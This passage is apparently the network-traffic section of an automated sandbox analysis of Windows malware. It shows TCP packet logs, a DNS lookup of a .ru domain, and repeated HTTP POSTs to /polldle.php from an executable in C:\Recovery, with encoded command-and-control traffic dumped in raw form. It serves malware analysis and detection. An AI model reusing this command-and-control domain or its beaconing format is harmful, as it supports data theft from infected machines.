                                                                                Jan 11, 2025 23:34:33.679568052 CET5013780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:33.680279970 CET5013880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:33.684591055 CET8050137104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:33.685153961 CET8050138104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:33.685235023 CET5013780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:33.685285091 CET5013880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:33.685380936 CET5013880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:33.690269947 CET8050138104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.036391020 CET5013880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:34.042687893 CET8050138104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.042717934 CET8050138104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.042749882 CET8050138104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.149949074 CET8050138104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.207993031 CET5013880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:34.400146961 CET8050138104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.442423105 CET5013880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:34.550168991 CET5013880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:34.550854921 CET5013980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:34.555430889 CET8050138104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.555506945 CET5013880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:34.555747032 CET8050139104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.555821896 CET5013980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:34.555898905 CET5013980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:34.560714006 CET8050139104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.911166906 CET5013980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:34.916271925 CET8050139104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.916309118 CET8050139104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:34.916342020 CET8050139104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.020275116 CET8050139104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.066703081 CET5013980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.099543095 CET5014080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.099853039 CET5013980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.104552984 CET8050140104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.104631901 CET5014080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.104732990 CET5014080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.105078936 CET8050139104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.105134010 CET5013980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.109548092 CET8050140104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.243794918 CET5014180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.248727083 CET8050141104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.248807907 CET5014180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.248857975 CET5014180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.253695011 CET8050141104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.457994938 CET5014080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.463068962 CET8050140104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.463123083 CET8050140104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.548927069 CET8050140104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.598599911 CET5014180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.603621006 CET8050141104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.603651047 CET8050141104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.603861094 CET8050141104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.661057949 CET5014080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.690952063 CET8050141104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.778247118 CET5014180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.820617914 CET8050140104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.907345057 CET8050140104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:35.907450914 CET5014080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:35.924890995 CET8050141104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.048366070 CET5014080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.048444986 CET5014180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.048944950 CET5014280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.053690910 CET8050140104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.053769112 CET5014080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.054095984 CET8050142104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.054125071 CET8050141104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.054173946 CET5014280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.054197073 CET5014180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.054343939 CET5014280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.059257030 CET8050142104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.411173105 CET5014280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.416338921 CET8050142104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.416371107 CET8050142104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.416398048 CET8050142104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.497936010 CET8050142104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.583767891 CET5014280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.739346027 CET8050142104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.817295074 CET5014280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.861604929 CET5014280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.862164974 CET5014380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.866697073 CET8050142104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.866759062 CET5014280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.866985083 CET8050143104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:36.867144108 CET5014380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.867213964 CET5014380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:36.872076988 CET8050143104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:37.223577023 CET5014380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:37.228518009 CET8050143104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:37.228548050 CET8050143104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:37.228574991 CET8050143104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:37.310647011 CET8050143104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:37.457911968 CET5014380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:37.549827099 CET8050143104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:37.661875010 CET5014380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:37.675451994 CET5014380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:37.676024914 CET5014480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:37.680566072 CET8050143104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:37.680854082 CET5014380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:37.680953026 CET8050144104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:37.681077957 CET5014480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:37.681149006 CET5014480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:37.685977936 CET8050144104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.036092043 CET5014480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.041609049 CET8050144104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.041639090 CET8050144104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.041666031 CET8050144104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.134295940 CET8050144104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.293664932 CET8050144104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.297914028 CET5014480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.424104929 CET5014480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.424227953 CET5014580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.429125071 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.429178953 CET8050144104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.433902979 CET5014480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.433981895 CET5014580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.434056997 CET5014580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.439258099 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.786257982 CET5014580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.791388035 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.791419983 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.791446924 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.879250050 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:39.004904985 CET5014580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:39.036425114 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:39.114191055 CET5014580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:39.123140097 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:39.230523109 CET5014580192.168.2.4104.21.38.84

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jan 11, 2025 23:32:50.999866009 CET5498853192.168.2.41.1.1.1
                                                                                Jan 11, 2025 23:32:51.011538982 CET53549881.1.1.1192.168.2.4

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Jan 11, 2025 23:32:50.999866009 CET192.168.2.41.1.1.10x48e6Standard query (0)588538cm.renyash.ruA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Jan 11, 2025 23:32:51.011538982 CET1.1.1.1192.168.2.40x48e6No error (0)588538cm.renyash.ru104.21.38.84A (IP address)IN (0x0001)false
                                                                                Jan 11, 2025 23:32:51.011538982 CET1.1.1.1192.168.2.40x48e6No error (0)588538cm.renyash.ru172.67.220.198A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • 588538cm.renyash.ru

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449736104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:32:51.067539930 CET318OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 344
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:32:51.427365065 CET344OUTData Raw: 00 03 01 01 06 0b 04 07 05 06 02 01 02 0d 01 06 00 0a 05 01 02 0c 03 00 07 05 0e 01 04 04 01 00 0c 56 06 5a 02 56 05 03 0b 07 05 01 06 01 06 01 06 06 0e 0c 0e 04 05 01 06 01 05 0c 01 0b 06 0a 02 06 0f 0f 05 06 06 51 0b 00 0c 50 0a 06 0c 09 04 01
                                                                                Data Ascii: VZVQP\\L~k^~cbj^wv`lqwohho_oloH{^vkC^t`i_~V@{m\rW
                                                                                Jan 11, 2025 23:32:51.510669947 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:51.762320995 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:51 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FfYCqex7LtEtvNaUqMQCrelPcpHm%2FKOdrJO1NPi7Bdc%2FPfP8dSQhKbeGnxeQDFaumqVU4MOoxauV%2FXLxDr4nwu6XBVX190bUYrNp%2BzN1Do1D8K%2Fv5crevHd%2BCcxiUEU2FTlbelLH"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d79a9f7c34f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2643&min_rtt=1564&rtt_var=2745&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=662&delivery_rate=143123&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 35 31 38 0d 0a 56 4a 7e 43 7b 6e 7b 03 78 4c 78 46 7c 62 77 44 7d 77 6f 08 68 4e 62 54 6e 73 73 5c 69 4c 78 4b 60 5a 6a 50 79 61 71 07 75 66 74 4a 7d 5b 78 01 55 4b 71 0d 76 62 73 02 7c 72 75 04 7f 74 65 55 6f 58 7b 50 6a 4d 5a 5c 75 04 75 02 63 71 6a 5a 7f 58 62 48 7e 6c 7b 53 7d 59 7c 5b 61 4c 7b 06 7c 5b 62 5b 7c 70 71 03 6c 5e 63 5d 7b 74 7c 05 78 6d 7b 01 79 61 60 49 78 4d 6d 5c 7f 4e 51 5b 78 74 60 03 7c 72 6f 4f 77 71 52 48 7a 51 41 5b 68 5e 6b 52 7f 5f 5f 0d 75 7c 5a 41 6f 7c 7b 58 60 60 75 52 7a 62 65 48 6a 52 71 5d 7a 72 79 59 62 5a 63 4a 76 5f 64 4c 76 61 66 50 7e 5d 79 5f 77 61 7d 04 76 66 6b 50 68 6f 76 5c 60 6f 74 04 7f 70 7c 02 6f 6f 6f 03 7a 63 76 03 7c 6d 6c 08 74 59 6f 5e 7e 62 5c 09 7e 6d 7b 42 6c 53 76 06 7d 62 7a 5f 7b 5d 46 51 7d 7c 5e 40 6a 70 68 0b 7e 64 61 5f 7b 54 67 4a 78 5c 70 48 6b 58 64 5a 7d 64 60 54 68 4e 69 0c 7a 5a 60 01 7d 62 78 4b 77 05 79 51 7b 5c 79 07 76 66 70 4b 7d 76 52 04 7e 58 7d 0b 77 62 59 4a 7c 4c 57 04 7f 77 7a 43 7b 58 74 40 7e 4d 6b 05 76 5c 5f 06 76 [TRUNCATED]
                                                                                Data Ascii: 518VJ~C{n{xLxF|bwD}wohNbTnss\iLxK`ZjPyaquftJ}[xUKqvbs|ruteUoX{PjMZ\uucqjZXbH~l{S}Y|[aL{|[b[|pql^c]{t|xm{ya`IxMm\NQ[xt`|roOwqRHzQA[h^kR__u|ZAo|{X``uRzbeHjRq]zryYbZcJv_dLvafP~]y_wa}vfkPhov\`otp|ooozcv|mltYo^~b\~m{BlSv}bz_{]FQ}|^@jph~da_{TgJx\pHkXdZ}d`ThNizZ`}bxKwyQ{\yvfpK}vR~X}wbYJ|LWwzC{Xt@~Mkv\_vqy|_T|^Ag{JvaU{rm|`S{YtCxIl{}kHzbx{sfA^hDywd}rgwqt~B{g`@}aqwlpxlxw^zzaW|lrzavIw
                                                                                Jan 11, 2025 23:32:51.762345076 CET878INData Raw: 63 55 01 77 61 5e 07 74 61 72 0b 7c 70 50 04 76 72 69 01 77 75 70 4f 7c 7c 57 05 74 42 70 42 7c 5d 74 01 7b 6c 7f 03 7b 60 58 00 7d 6d 5e 41 74 59 74 41 7e 4c 50 0c 7e 43 73 0b 78 6d 7e 05 7e 4c 79 40 7c 60 7c 4f 7d 7c 78 41 7e 4e 64 0b 7d 59 50
                                                                                Data Ascii: cUwa^tar|pPvriwupO||WtBpB|]t{l{`X}m^AtYtA~LP~Csxm~~Ly@|`|O}|xA~Nd}YPzmcxL`|aK}Y^izc`BbdKvcyByq[JvXtH~Hd~vSBtrwrSgTxHxB~sguLyta[_~K}l|}wu_k{b}I~NmxYlyg|ymgFy\`xMf{]NZ{I]XjL{@ab`}UswZA}amblw]{BU\vp~
                                                                                Jan 11, 2025 23:32:51.808798075 CET294OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 384
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:32:51.902576923 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:51.902772903 CET384OUTData Raw: 58 5a 54 51 5f 42 5f 5d 54 5d 55 5a 50 5d 59 59 50 56 5a 59 57 54 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZTQ_B_]T]UZP]YYPVZYWTP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C.3%2^32&%?R4<!_/87</#U106-B4";](%#X'/\/
                                                                                Jan 11, 2025 23:32:52.143965960 CET964INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:52 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=699vq%2BN8NgHBq%2BPHdIHjpGzJULsPZIaSVGBPOtQHB16L8oQoC4WQAv%2FAWHR%2BjdEK60EhWGvaGFb4SxZ%2BeXai2r6xFViAqdNG5XGjYGliHP%2FrTVE1G0rPpMPeamCwNPuLiXJa1cAu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d7c2d1ec34f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4768&min_rtt=1564&rtt_var=6230&sent=9&recv=10&lost=0&retrans=0&sent_bytes=2164&recv_bytes=1340&delivery_rate=2660996&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 56 24 0a 30 58 29 39 01 5e 2d 01 38 04 2c 21 27 01 3e 0f 21 06 34 39 23 01 26 0b 38 1b 3e 3a 03 09 28 04 01 55 23 2e 2e 55 31 03 23 46 0c 1d 22 5c 3d 59 23 0b 26 3c 28 10 3f 1d 03 05 32 0b 2f 18 3e 1a 34 0d 3e 14 0f 58 23 2f 25 0d 3f 32 26 0a 28 26 32 19 2e 31 2c 02 24 3a 2e 51 0f 16 21 1c 22 21 28 59 37 3d 33 17 31 30 38 07 2b 34 38 58 25 29 27 09 28 0d 39 03 28 1c 0e 1d 24 04 33 57 26 3f 3e 5d 28 07 3f 18 3f 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.V$0X)9^-8,!'>!49#&8>:(U#..U1#F"\=Y#&<(?2/>4>X#/%?2&(&2.1,$:.Q!"!(Y7=3108+48X%)'(9($3W&?>](??;$\#(V?[M0
                                                                                Jan 11, 2025 23:32:52.295711994 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1616
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:32:52.389503956 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:52.389677048 CET1616OUTData Raw: 58 51 51 57 5f 46 5a 58 54 5d 55 5a 50 59 59 5d 50 50 5a 52 57 5d 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQQW_FZXT]UZPYY]PPZRW]PV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU , .2^;&*'Y)",X-;Z<?#S2%9452\(%#X'/\/0
                                                                                Jan 11, 2025 23:32:52.681299925 CET961INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:52 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=60yL%2BUhVO8di5M2ZtH%2Fp%2ByX0YU3DbQEbDRyXMcJT2p0BXXLy3iUCnhCZAvuKuvHTPkUQF8yhi8PIcedPKmOfdpD3PfxI0vMrzwvnaORNxfd6KUS8mkKKYwWlQEFmQCir%2FjWjopcF"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d7f28b3c34f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6077&min_rtt=1513&rtt_var=7500&sent=15&recv=16&lost=0&retrans=0&sent_bytes=3153&recv_bytes=3251&delivery_rate=2660996&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 1e 30 0a 20 13 2a 3a 37 13 2d 16 2f 59 2d 31 0a 12 3e 32 32 5e 37 3a 20 5b 25 1c 0e 51 28 14 31 40 28 14 38 0c 34 58 22 54 27 39 23 46 0c 1d 22 1f 3f 2c 3f 0e 31 05 27 05 3c 23 36 58 25 0c 0a 07 2a 1a 0e 0d 3d 04 25 59 36 2f 22 18 2a 22 0f 51 3e 0b 29 02 2e 22 2f 5a 32 3a 2e 51 0f 16 22 09 35 32 2c 58 20 3e 37 5f 25 23 3b 5a 29 37 38 5a 26 5c 24 56 3c 33 04 5f 3c 0c 0a 50 27 03 33 51 26 59 3a 14 3f 5f 37 53 3f 01 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.0 *:7-/Y-1>22^7: [%Q(1@(84X"T'9#F"?,?1'<#6X%*=%Y6/"*"Q>)."/Z2:.Q"52,X >7_%#;Z)78Z&\$V<3_<P'3Q&Y:?_7S?$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.449737104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:32:51.962318897 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:32:52.317413092 CET2504OUTData Raw: 58 51 54 55 5f 43 5f 5c 54 5d 55 5a 50 5b 59 5d 50 51 5a 5f 57 55 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTU_C_\T]UZP[Y]PQZ_WUP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,0*E%%"%,:4Z%-;+)?'206:7613X?5#X'/\/
                                                                                Jan 11, 2025 23:32:52.434441090 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:52.672867060 CET811INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:52 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFikO1q27IZU%2BngDbRD8AlWoekDxkR69%2BWGmMQhjNDAVCDVY6nsOZyHAKWjZ%2FcLN2mb5PFlMHguKYP%2F%2F0TRqEJYCcotZVIBCiMiFZzh%2Fi70Q07xX00ZaLYIxXDO9DwtKwBlRRUfw"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d7f6e565e86-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6603&min_rtt=1639&rtt_var=10543&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=35304&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.449738104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:32:52.881068945 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
